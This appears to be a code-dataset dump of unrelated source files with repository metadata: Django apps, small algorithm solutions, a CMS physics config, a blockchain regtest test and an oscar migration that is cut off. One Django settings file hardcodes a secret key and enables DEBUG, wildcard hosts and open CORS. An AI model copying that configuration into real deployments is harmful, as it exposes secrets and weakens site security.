""" This type stub file was generated by pyright. """ def revword(word): ... def step(word, x, xf, y, yf, grid): ... def check(word, dir, x, y, grid, rows, cols): ... def wordfinder(words, rows=..., cols=..., attempts=..., alph=...): """ Attempt to arrange words into a letter-grid with the specified number of rows and columns. Try each word in several positions and directions, until it can be fitted into the grid, or the maximum number of allowable attempts is exceeded. Returns a tuple consisting of the grid and the words that were successfully placed. :param words: the list of words to be put into the grid :type words: list :param rows: the number of rows in the grid :type rows: int :param cols: the number of columns in the grid :type cols: int :param attempts: the number of times to attempt placing a word :type attempts: int :param alph: the alphabet, to be used for filling blank cells :type alph: list :rtype: tuple """ ... def word_finder(): ... if __name__ == '__main__': ...
[ "manas.dash@tesco.com" ]
manas.dash@tesco.com
6f9545c1c44ca8d988e519fb3ea7915411b32e56
bf76afd4a984e5cee607a76f2bb9490797010b33
/accounts/api/urls.py
33d0ccc97a22e3b2c5a927ae38ee366e7f23f25f
[]
no_license
itsloys/tweet
a0c75718dd78971aae03129895b0e710dad0b7cc
dfd3a745ac83842999ca9af9085ab26adb150295
refs/heads/master
2021-09-07T02:51:33.646734
2018-02-16T05:55:49
2018-02-16T05:55:49
null
0
0
null
null
null
null
UTF-8
Python
false
false
189
py
from django.conf.urls import url from tweets.api.views import ( TweetListAPIView ) urlpatterns = [ url(r'^(?P<username>[\w.@+-]+)/tweet/$', TweetListAPIView.as_view(), name='list'), ]
[ "louisaleksieb.dagusen@gmail.com" ]
louisaleksieb.dagusen@gmail.com
ead0e0a903999cb85caad2b76d28601ad31e19a1
590a4f34de0dd9b964b52e41d84cf3218609c9d4
/climbingStairs.py
1ca699fb1a7c1009fc8ee36c297063024d7130f0
[]
no_license
zhrmrz/climbingStairs
81d97c5b23b811116192ea27172170a9ff55aa68
0455ad42e56dca3a1ee66c121323faf90d1efc98
refs/heads/master
2020-04-23T03:50:25.962986
2019-02-15T15:52:32
2019-02-15T15:52:32
170,889,452
0
0
null
null
null
null
UTF-8
Python
false
false
316
py
class Sol: def climbing_stairs(self,numOfStairs): if numOfStairs ==1 or numOfStairs ==0: return 1 return self.climbing_stairs(numOfStairs - 1) + self.climbing_stairs(numOfStairs - 2) if __name__ == '__main__': numOfStairs=5 p1=Sol() print(p1.climbing_stairs(numOfStairs))
[ "noreply@github.com" ]
zhrmrz.noreply@github.com
666e846a19ec40bfb77ca6238787a9f10d1e0bc6
aaad70e69d37f92c160c07e4ca03de80becf2c51
/filesystem/usr/lib/python3.6/typing.py
38eba04e677eb46599d1e8690a84dbc547044f3f
[]
no_license
OSWatcher/ubuntu-server
9b4dcad9ced1bff52ec9cdb4f96d4bdba0ad3bb9
17cb333124c8d48cf47bb9cec1b4e1305626b17a
refs/heads/master
2023-02-10T18:39:43.682708
2020-12-26T01:02:54
2020-12-26T01:02:54
null
0
0
null
null
null
null
UTF-8
Python
false
false
186
py
{ "MIME": "text/x-python", "inode_type": "REG", "magic_type": "Python script, ASCII text executable", "mode": "-rw-r--r--", "sha1": "827ca9e64ac471213db81b20b50191728a1e0db3" }
[ "mathieu.tarral@protonmail.com" ]
mathieu.tarral@protonmail.com
c2d8c4486d51afdfedb04e6bdffca8563e713970
ca7aa979e7059467e158830b76673f5b77a0f5a3
/Python_codes/p02801/s692186683.py
101c9198ef90d45399d7eca841820863bdf5ef86
[]
no_license
Aasthaengg/IBMdataset
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
refs/heads/main
2023-04-22T10:22:44.763102
2021-05-13T17:27:22
2021-05-13T17:27:22
367,112,348
0
0
null
null
null
null
UTF-8
Python
false
false
39
py
C = input() D = chr(ord(C)+1) print(D)
[ "66529651+Aastha2104@users.noreply.github.com" ]
66529651+Aastha2104@users.noreply.github.com
e7d02b3f6ce84fe8eae213ef42f6cb8167f57557
6f69ec5f27716b36d7a61b2d150408118bb65559
/app/views/clients.py
5dd16656b768657d3c7388690c44440372371d8c
[ "MIT" ]
permissive
m3ssana/memegen
a3c35a51cc7a45e9ab3556ee5665775b578985f8
20510753d7c6811a75295580f6fdb2c459124e7d
refs/heads/main
2023-03-15T18:50:23.546416
2022-07-12T21:19:46
2022-07-12T21:19:46
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,515
py
from sanic import Blueprint, response from sanic_ext import openapi from .. import utils from .helpers import preview_image from .schemas import AuthResponse, ErrorResponse blueprint = Blueprint("clients", url_prefix="/") @blueprint.post("/auth") @openapi.summary("Validate your API key") @openapi.response(200, {"application/json": AuthResponse}, "Your API key is valid") @openapi.response(401, {"application/json": ErrorResponse}, "Your API key is invalid") async def validate(request): info = await utils.meta.authenticate(request) return response.json( info or {"error": "API key missing or invalid."}, status=200 if info else 401, ) @blueprint.get("/images/preview.jpg") @openapi.summary("Display a preview of a custom meme") @openapi.parameter("text[]", str, "query", description="Lines of text to render") @openapi.parameter("style", str, "query", description="Style name or custom overlay") @openapi.parameter( "template", str, "query", description="Template ID, URL, or custom background" ) @openapi.response(200, {"image/jpeg": bytes}, "Successfully displayed a custom meme") async def preview(request): id = request.args.get("template", "_error") lines = request.args.getlist("text[]") or request.args.getlist("lines[]") or [] style = request.args.get("style") or ",".join(request.args.getlist("styles[]", [])) while style.endswith(",default"): style = style.removesuffix(",default") return await preview_image(request, id, lines, style)
[ "jacebrowning@gmail.com" ]
jacebrowning@gmail.com
2525bb90231a226a0ea32ccb99249f17ba841247
60715c9ea4c66d861708531def532814eab781fd
/python-programming-workshop/list/24.listmethods.py
4cee5ef936923f1209b1adfc70b9c2d7c66add57
[]
no_license
bala4rtraining/python_programming
6ce64d035ef04486f5dc9572cb0975dd322fcb3e
99a5e6cf38448f5a01b310d5f7fa95493139b631
refs/heads/master
2023-09-03T00:10:26.272124
2021-11-01T08:20:52
2021-11-01T08:20:52
null
0
0
null
null
null
null
UTF-8
Python
false
false
467
py
fruits = ['orange', 'apple', 'pear', 'banana', 'kiwi', 'apple', 'banana'] print(fruits[0]) print(fruits.count('apple')) print(fruits.count('tangerine')) print(fruits.index('banana')) print(fruits.index('banana', 4)) # Find next banana starting a position 4 print(fruits.reverse()) # the fruits reverse is returning None print(fruits) fruits.append('grape') print(fruits) fruits.sort() print(fruits) fruits.pop() print(fruits) fruits.remove('apple') print(fruits)
[ "karthikkannan@gmail.com" ]
karthikkannan@gmail.com
c18ebb7f50f1f17388bcd0a8d07ad564c0918332
e570b6d6ffee8b600d0047ff9eeb8eb671660a58
/7. NLTK/NLTK Code.py
40695e3ab519bbe04b320d5813447a5f4f4e4df1
[]
no_license
ShashankSinha98/MachineLearning
06619687bb83a47c9425dee3a5947747f49bbbb8
3b6e94107a8dad6bd25faef400bcc94ed1a77ca4
refs/heads/master
2022-07-09T14:33:44.674227
2020-05-12T19:27:22
2020-05-12T19:27:22
256,843,189
0
0
null
null
null
null
UTF-8
Python
false
false
650
py
#!/usr/bin/env python # coding: utf-8 # In[7]: import nltk # In[9]: from nltk.corpus import brown # In[10]: # Corpus- Large collection of text brown.categories() # In[11]: data = brown.sents(categories='fiction') # In[18]: print(" ".join(data[1])) # In[19]: from nltk.corpus import stopwords sw = set(stopwords.words('english')) # In[21]: print(len(sw)) # In[22]: def remove_stopwords(words,sw): useful_words = [] useful_words = [w for w in words if w not in sw] return useful_words # In[24]: setence = "I do not love her very much" ans = remove_stopwords(setence.split(),sw) print(ans) # In[ ]:
[ "34626597+ShashankSinha98@users.noreply.github.com" ]
34626597+ShashankSinha98@users.noreply.github.com
36cc8b3c58ca68674925a18aac8712498e09708e
d225ec04301d8abd681d68ad8d7316befc404bc1
/ZShape/EffAcc/python/scans/EE_mean_Apr12_1251_cfg.py
e60ceb0aea80a1df554aef8fd6b6e2792995aa08
[]
no_license
UMN-CMS/ZShape_Analysis
372ea0083d6c0bda2dbba30322ef01269501afa8
83bff158b21210b048afbcff0af1e803780ad4bd
refs/heads/master
2020-06-07T10:34:40.227684
2013-12-11T16:59:25
2013-12-11T16:59:25
null
0
0
null
null
null
null
UTF-8
Python
false
false
5,424
py
import FWCore.ParameterSet.Config as cms process = cms.Process("Zefficiency") process.TimerService = cms.Service("TimerService") process.load('FWCore.MessageService.MessageLogger_cfi') process.MessageLogger.cerr.FwkReport.reportEvery = 1000 process.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(True), SkipEvent = cms.untracked.vstring('ProductNotFound') ) process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(30000) ) process.source = cms.Source("PoolSource", duplicateCheckMode = cms.untracked.string('noDuplicateCheck'), fileNames = cms.untracked.vstring("file:/home/jmmans/data/zshape/Summer11_DYToEE_M-20_CT10_TuneZ2_7TeV-powheg-pythia/F61A0CD6-9AA8-E011-A92B-0024E8769B05.root" ) ) process.TFileService = cms.Service("TFileService", fileName = cms.string('histo_10M_partBUILDINGTTEST.root') ) process.f2s = cms.EDProducer("ZFullSim2Event" ) import ZShape.EffAcc.FullSimSmearedElectronProducer_cfi import ZShape.EffAcc.ZEfficiencyKevin_cfi process.EEXmeanX0X989Xsmear = ZShape.EffAcc.FullSimSmearedElectronProducer_cfi.FullSimSmearedElectronsProducer.clone() process.EEXmeanX0X989Xsmear.EE.mean = cms.double(0.989) process.EEXmeanX0X989 = ZShape.EffAcc.ZEfficiencyKevin_cfi.mcEff.clone() process.EEXmeanX0X989.zTreeLevelElectronsCollection = cms.untracked.InputTag("f2s","ZEventEle3") process.EEXmeanX0X989.zsrc = cms.untracked.InputTag("EEXmeanX0X989Xsmear","ZEventParticles") process.EEXmeanX0X989.zElectronsCollection = cms.untracked.InputTag("EEXmeanX0X989Xsmear","ZEventParticles") process.EEXmeanX0X990Xsmear = ZShape.EffAcc.FullSimSmearedElectronProducer_cfi.FullSimSmearedElectronsProducer.clone() process.EEXmeanX0X990Xsmear.EE.mean = cms.double(0.990) process.EEXmeanX0X990 = ZShape.EffAcc.ZEfficiencyKevin_cfi.mcEff.clone() process.EEXmeanX0X990.zTreeLevelElectronsCollection = cms.untracked.InputTag("f2s","ZEventEle3") process.EEXmeanX0X990.zsrc = cms.untracked.InputTag("EEXmeanX0X990Xsmear","ZEventParticles") process.EEXmeanX0X990.zElectronsCollection = cms.untracked.InputTag("EEXmeanX0X990Xsmear","ZEventParticles") process.EEXmeanX0X991Xsmear = ZShape.EffAcc.FullSimSmearedElectronProducer_cfi.FullSimSmearedElectronsProducer.clone() process.EEXmeanX0X991Xsmear.EE.mean = cms.double(0.991) process.EEXmeanX0X991 = ZShape.EffAcc.ZEfficiencyKevin_cfi.mcEff.clone() process.EEXmeanX0X991.zTreeLevelElectronsCollection = cms.untracked.InputTag("f2s","ZEventEle3") process.EEXmeanX0X991.zsrc = cms.untracked.InputTag("EEXmeanX0X991Xsmear","ZEventParticles") process.EEXmeanX0X991.zElectronsCollection = cms.untracked.InputTag("EEXmeanX0X991Xsmear","ZEventParticles") process.EEXmeanX0X992Xsmear = ZShape.EffAcc.FullSimSmearedElectronProducer_cfi.FullSimSmearedElectronsProducer.clone() process.EEXmeanX0X992Xsmear.EE.mean = cms.double(0.992) process.EEXmeanX0X992 = ZShape.EffAcc.ZEfficiencyKevin_cfi.mcEff.clone() process.EEXmeanX0X992.zTreeLevelElectronsCollection = cms.untracked.InputTag("f2s","ZEventEle3") process.EEXmeanX0X992.zsrc = cms.untracked.InputTag("EEXmeanX0X992Xsmear","ZEventParticles") process.EEXmeanX0X992.zElectronsCollection = cms.untracked.InputTag("EEXmeanX0X992Xsmear","ZEventParticles") process.EEXmeanX0X993Xsmear = ZShape.EffAcc.FullSimSmearedElectronProducer_cfi.FullSimSmearedElectronsProducer.clone() process.EEXmeanX0X993Xsmear.EE.mean = cms.double(0.993) process.EEXmeanX0X993 = ZShape.EffAcc.ZEfficiencyKevin_cfi.mcEff.clone() process.EEXmeanX0X993.zTreeLevelElectronsCollection = cms.untracked.InputTag("f2s","ZEventEle3") process.EEXmeanX0X993.zsrc = cms.untracked.InputTag("EEXmeanX0X993Xsmear","ZEventParticles") process.EEXmeanX0X993.zElectronsCollection = cms.untracked.InputTag("EEXmeanX0X993Xsmear","ZEventParticles") process.EEXmeanX0X994Xsmear = ZShape.EffAcc.FullSimSmearedElectronProducer_cfi.FullSimSmearedElectronsProducer.clone() process.EEXmeanX0X994Xsmear.EE.mean = cms.double(0.994) process.EEXmeanX0X994 = ZShape.EffAcc.ZEfficiencyKevin_cfi.mcEff.clone() process.EEXmeanX0X994.zTreeLevelElectronsCollection = cms.untracked.InputTag("f2s","ZEventEle3") process.EEXmeanX0X994.zsrc = cms.untracked.InputTag("EEXmeanX0X994Xsmear","ZEventParticles") process.EEXmeanX0X994.zElectronsCollection = cms.untracked.InputTag("EEXmeanX0X994Xsmear","ZEventParticles") process.EEXmeanX0X995Xsmear = ZShape.EffAcc.FullSimSmearedElectronProducer_cfi.FullSimSmearedElectronsProducer.clone() process.EEXmeanX0X995Xsmear.EE.mean = cms.double(0.995) process.EEXmeanX0X995 = ZShape.EffAcc.ZEfficiencyKevin_cfi.mcEff.clone() process.EEXmeanX0X995.zTreeLevelElectronsCollection = cms.untracked.InputTag("f2s","ZEventEle3") process.EEXmeanX0X995.zsrc = cms.untracked.InputTag("EEXmeanX0X995Xsmear","ZEventParticles") process.EEXmeanX0X995.zElectronsCollection = cms.untracked.InputTag("EEXmeanX0X995Xsmear","ZEventParticles") process.load("RecoEgamma.EgammaHFProducers.hfEMClusteringSequence_cff") process.p = cms.Path(process.hfRecoEcalCandidate+process.f2s + process.EEXmeanX0X989Xsmear + process.EEXmeanX0X989 + process.EEXmeanX0X990Xsmear + process.EEXmeanX0X990 + process.EEXmeanX0X991Xsmear + process.EEXmeanX0X991 + process.EEXmeanX0X992Xsmear + process.EEXmeanX0X992 + process.EEXmeanX0X993Xsmear + process.EEXmeanX0X993 + process.EEXmeanX0X994Xsmear + process.EEXmeanX0X994 + process.EEXmeanX0X995Xsmear + process.EEXmeanX0X995 )
[ "klapoetke@physics.umn.edu" ]
klapoetke@physics.umn.edu
8064eb59894b1a18df1ff8998010971ec3b593f0
9cabdeb8dce5718e8f4f490f3684eba0eb1f2d2e
/test/functional/minchainwork.py
159c107cadbc5d27259a8c9fbe3ae4678e647321
[ "MIT" ]
permissive
wolfoxonly/woo
fcfe275007cb102fff10239b0f722264dbbd40e2
a5fb13575afe855b58915bd8e15cbffb9015e5e2
refs/heads/master
2020-03-09T17:00:57.668308
2018-05-13T15:21:17
2018-05-13T15:21:17
127,590,136
0
0
null
null
null
null
UTF-8
Python
false
false
3,949
py
#!/usr/bin/env python3 # Copyright (c) 2017 The Woochain Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Test logic for setting nMinimumChainWork on command line. Nodes don't consider themselves out of "initial block download" until their active chain has more work than nMinimumChainWork. Nodes don't download blocks from a peer unless the peer's best known block has more work than nMinimumChainWork. While in initial block download, nodes won't relay blocks to their peers, so test that this parameter functions as intended by verifying that block relay only succeeds past a given node once its nMinimumChainWork has been exceeded. """ import time from test_framework.test_framework import WoochainTestFramework from test_framework.util import connect_nodes, assert_equal # 2 hashes required per regtest block (with no difficulty adjustment) REGTEST_WORK_PER_BLOCK = 2 class MinimumChainWorkTest(WoochainTestFramework): def set_test_params(self): self.setup_clean_chain = True self.num_nodes = 3 self.extra_args = [[], ["-minimumchainwork=0x65"], ["-minimumchainwork=0x65"]] self.node_min_work = [0, 101, 101] def setup_network(self): # This test relies on the chain setup being: # node0 <- node1 <- node2 # Before leaving IBD, nodes prefer to download blocks from outbound # peers, so ensure that we're mining on an outbound peer and testing # block relay to inbound peers. self.setup_nodes() for i in range(self.num_nodes-1): connect_nodes(self.nodes[i+1], i) def run_test(self): # Start building a chain on node0. node2 shouldn't be able to sync until node1's # minchainwork is exceeded starting_chain_work = REGTEST_WORK_PER_BLOCK # Genesis block's work self.log.info("Testing relay across node %d (minChainWork = %d)", 1, self.node_min_work[1]) starting_blockcount = self.nodes[2].getblockcount() num_blocks_to_generate = int((self.node_min_work[1] - starting_chain_work) / REGTEST_WORK_PER_BLOCK) self.log.info("Generating %d blocks on node0", num_blocks_to_generate) hashes = self.nodes[0].generate(num_blocks_to_generate) self.log.info("Node0 current chain work: %s", self.nodes[0].getblockheader(hashes[-1])['chainwork']) # Sleep a few seconds and verify that node2 didn't get any new blocks # or headers. We sleep, rather than sync_blocks(node0, node1) because # it's reasonable either way for node1 to get the blocks, or not get # them (since they're below node1's minchainwork). time.sleep(3) self.log.info("Verifying node 2 has no more blocks than before") self.log.info("Blockcounts: %s", [n.getblockcount() for n in self.nodes]) # Node2 shouldn't have any new headers yet, because node1 should not # have relayed anything. assert_equal(len(self.nodes[2].getchaintips()), 1) assert_equal(self.nodes[2].getchaintips()[0]['height'], 0) assert self.nodes[1].getbestblockhash() != self.nodes[0].getbestblockhash() assert_equal(self.nodes[2].getblockcount(), starting_blockcount) self.log.info("Generating one more block") self.nodes[0].generate(1) self.log.info("Verifying nodes are all synced") # Because nodes in regtest are all manual connections (eg using # addnode), node1 should not have disconnected node0. If not for that, # we'd expect node1 to have disconnected node0 for serving an # insufficient work chain, in which case we'd need to reconnect them to # continue the test. self.sync_all() self.log.info("Blockcounts: %s", [n.getblockcount() for n in self.nodes]) if __name__ == '__main__': MinimumChainWorkTest().main()
[ "415313577@qq.com" ]
415313577@qq.com
f1b6352f34d1c818206ce4aea972ca832c438851
208d8a40d1497b1623a9ea78ece4a493e5182661
/redwood/settings.py
a34acff441c423ca7fc5296cf908b114ce437a42
[]
no_license
muremwa/RedWood
273de7c5edfac3b43c4e91f03921062375312912
c0735999f517b280de8211022daeead4ea45bb17
refs/heads/master
2021-07-08T02:17:09.659659
2020-08-09T15:33:51
2020-08-09T15:33:51
166,394,652
2
0
null
null
null
null
UTF-8
Python
false
false
3,454
py
import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '_o^^x=d#@7ufl_g(9ef!wbz8i042gg)_9lyox!vk7p332sq_mr' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = ["*"] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'watch.apps.WatchConfig', 'accounts.apps.AccountsConfig', 'staff.apps.StaffConfig', 'rest_framework', 'rest_framework.authtoken', 'corsheaders', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', 'corsheaders.middleware.CorsMiddleware', ] CORS_ORIGIN_ALLOW_ALL = True REST_FRAMEWORK = { 'DEFAULT_AUTHENTICATION_CLASSES': ( 'rest_framework.authentication.TokenAuthentication', 'rest_framework.authentication.SessionAuthentication', ) } ROOT_URLCONF = 'redwood.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [os.path.join(BASE_DIR, 'templates')], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'redwood.wsgi.application' # Database # https://docs.djangoproject.com/en/2.1/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'mysql.connector.django', 'OPTIONS': { 'option_files': 'smile.cnf' }, } } # Password validation # https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # comment out when debug is true STATICFILES_DIRS = ( os.path.join(BASE_DIR, "redwood/static"), ) # Internationalization # https://docs.djangoproject.com/en/2.1/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'Africa/Nairobi' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/2.1/howto/static-files/ STATIC_URL = '/static/' MEDIA_ROOT = os.path.join(BASE_DIR, "media") MEDIA_URL = '/media/'
[ "danmburu254@gmail.com" ]
danmburu254@gmail.com
66b497a4b3bbb7bdc22d36c21f835862ef2a988e
efd517e88c1016ae23156c7efd31ef35421b00e8
/oscar/apps/partner/migrations/0012_no_null_in_charfields.py
c79c27f5415ba8b14cdf187f870ac9034bee3785
[ "LicenseRef-scancode-unknown-license-reference", "BSD-3-Clause", "BSD-2-Clause" ]
permissive
harshadbhatia/django-oscar
2b387f002059c3b8a1dcb231384bc3d7bc6c0bad
d6b51d8719bc9f7a633c157197405ba59eb07f3b
refs/heads/master
2022-07-27T17:03:51.074089
2014-06-20T15:36:43
2014-06-20T15:36:43
21,063,503
0
0
BSD-3-Clause
2023-08-24T20:08:25
2014-06-21T07:56:14
Python
UTF-8
Python
false
false
20,661
py
# -*- coding: utf-8 -*- import datetime from south.db import db from south.v2 import DataMigration from django.db import models from oscar.core.compat import AUTH_USER_MODEL, AUTH_USER_MODEL_NAME class Migration(DataMigration): def forwards(self, orm): orm.PartnerAddress.objects.filter(first_name__isnull=True).update(first_name='') orm.PartnerAddress.objects.filter(title__isnull=True).update(title='') orm.PartnerAddress.objects.filter(line4__isnull=True).update(line4='') orm.PartnerAddress.objects.filter(line3__isnull=True).update(line3='') orm.PartnerAddress.objects.filter(line2__isnull=True).update(line2='') orm.PartnerAddress.objects.filter(state__isnull=True).update(state='') orm.PartnerAddress.objects.filter(postcode__isnull=True).update(postcode='') orm.Partner.objects.filter(name__isnull=True).update(name='') def backwards(self, orm): raise RuntimeError("Cannot reverse this migration.") models = { u'address.country': { 'Meta': {'ordering': "('-display_order', 'name')", 'object_name': 'Country'}, 'display_order': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0', 'db_index': 'True'}), 'is_shipping_country': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}), 'iso_3166_1_a2': ('django.db.models.fields.CharField', [], {'max_length': '2', 'primary_key': 'True'}), 'iso_3166_1_a3': ('django.db.models.fields.CharField', [], {'max_length': '3', 'null': 'True', 'db_index': 'True'}), 'iso_3166_1_numeric': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'db_index': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'printable_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}) }, u'auth.group': { 'Meta': {'object_name': 'Group'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}) }, u'auth.permission': { 'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, AUTH_USER_MODEL: { 'Meta': {'object_name': AUTH_USER_MODEL_NAME}, 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}), 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) }, u'catalogue.attributeentity': { 'Meta': {'object_name': 'AttributeEntity'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'blank': 'True'}), 'type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'entities'", 'to': u"orm['catalogue.AttributeEntityType']"}) }, u'catalogue.attributeentitytype': { 'Meta': {'object_name': 'AttributeEntityType'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'blank': 'True'}) }, u'catalogue.attributeoption': { 'Meta': {'object_name': 'AttributeOption'}, 'group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'options'", 'to': u"orm['catalogue.AttributeOptionGroup']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'option': ('django.db.models.fields.CharField', [], {'max_length': '255'}) }, u'catalogue.attributeoptiongroup': { 'Meta': {'object_name': 'AttributeOptionGroup'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}) }, u'catalogue.category': { 'Meta': {'ordering': "['full_name']", 'object_name': 'Category'}, 'depth': ('django.db.models.fields.PositiveIntegerField', [], {}), 'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}), 'full_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}), 'numchild': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}), 'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}), 'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'}) }, u'catalogue.option': { 'Meta': {'object_name': 'Option'}, 'code': ('oscar.models.fields.autoslugfield.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '128', 'separator': "u'-'", 'blank': 'True', 'unique': 'True', 'populate_from': "'name'", 'overwrite': 'False'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'type': ('django.db.models.fields.CharField', [], {'default': "'Required'", 'max_length': '128'}) }, u'catalogue.product': { 'Meta': {'ordering': "['-date_created']", 'object_name': 'Product'}, 'attributes': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['catalogue.ProductAttribute']", 'through': u"orm['catalogue.ProductAttributeValue']", 'symmetrical': 'False'}), 'categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['catalogue.Category']", 'through': u"orm['catalogue.ProductCategory']", 'symmetrical': 'False'}), 'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}), 'date_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_index': 'True', 'blank': 'True'}), 'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_discountable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'variants'", 'null': 'True', 'to': u"orm['catalogue.Product']"}), 'product_class': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'products'", 'null': 'True', 'on_delete': 'models.PROTECT', 'to': u"orm['catalogue.ProductClass']"}), 'product_options': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['catalogue.Option']", 'symmetrical': 'False', 'blank': 'True'}), 'rating': ('django.db.models.fields.FloatField', [], {'null': 'True'}), 'recommended_products': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['catalogue.Product']", 'symmetrical': 'False', 'through': u"orm['catalogue.ProductRecommendation']", 'blank': 'True'}), 'related_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'relations'", 'blank': 'True', 'to': u"orm['catalogue.Product']"}), 'score': ('django.db.models.fields.FloatField', [], {'default': '0.0', 'db_index': 'True'}), 'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}), 